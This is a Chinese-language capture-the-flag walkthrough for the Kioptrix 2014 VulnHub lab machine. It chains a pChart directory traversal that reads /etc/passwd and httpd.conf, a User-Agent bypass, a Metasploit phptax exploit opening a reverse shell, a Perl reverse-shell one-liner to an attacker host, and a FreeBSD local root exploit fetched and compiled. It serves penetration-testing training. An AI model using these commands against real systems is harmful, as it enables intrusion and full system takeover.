虚拟机信息
虚拟机下载地址:https://www.vulnhub.com/entry/kioptrix-2014-5,62/
虚拟机简介:开虚拟机电源之前,建议移除网卡并重新添加
目标:1个flag
级别:中级
1、主机探测
1、通过netdiscover检测主机IP地址
arp-scan 192.168.207.0/24
2、服务探测
1、通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.207.136
查看开放22、80、8080端口
3、渗透测试
3.1 HTTP渗透
1.访问站点信息如下
访问80端口页面未发现有用信息
2.查看网页源代码
提示可以访问隐藏页面
查看访问站点信息
3.搜索站点漏洞
searchsploit pchart 2.1.3
查看漏洞详情,可以目录遍历
searchsploit -x php/webapps/31173
4.查看/etc/passwd文件
http://192.168.207.136/pChart2.1.3/examples/index.php?Action=View&Script=/etc/passwd
获取到操作系统版本为FreeBSD9
5.查看Apache默认配置
http://192.168.207.136/pChart2.1.3/examples/index.php?Action=View&Script=/usr/local/etc/apache22/httpd.conf
查看8080端口只允许User-Agent Mozilla/4.0版本访问
6.访问站点
使用浏览器插件User-Agent Switcher and Manager,修改User-Agent
查看可以正常打开网页
查看网页信息
7.搜索站点应用漏洞
查看网页源代码获取到应用信息,该应用在2003年发布
基于搜索查看发现发布的版本信息,包括2002.0.8和2002.0.7
8.使用searchsploit搜索
searchsploit phptax
其中发现有MSF的利用脚本
9.使用MSF进行利用
use exploit/multi/http/phptax_exec
set rhosts 192.168.207.136
set rport 8080
set UserAgent Mozilla/4.0
set payload cmd/unix/reverse
set lhost 192.168.207.130
run
成功获取到shell连接
3.2 系统渗透
1.使用perl进行反弹shell
测试发下主机未安装python,只安装perl语言
perl -e 'use Socket;$i="192.168.207.130";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
2.查看系统版本
uname -a
3.搜索系统相关漏洞
searchsploit freebsd 9.0
4.查看安装软件
which gcc curl wget fetch
查看主机上没有安装curl和wget,可以通过fetch进行下载
5.创建简单http
cp /usr/share/exploitdb/exploits/freebsd/local/26368.c ./
python -m http.server 8080
6.下载文件
cd /tmp
fetch http://192.168.207.130:8080/26368.c
gcc 26368.c -o shell
./shell
7.查看flag信息
cd /root
cat congrats.txt
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Kioptrix: 2014
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论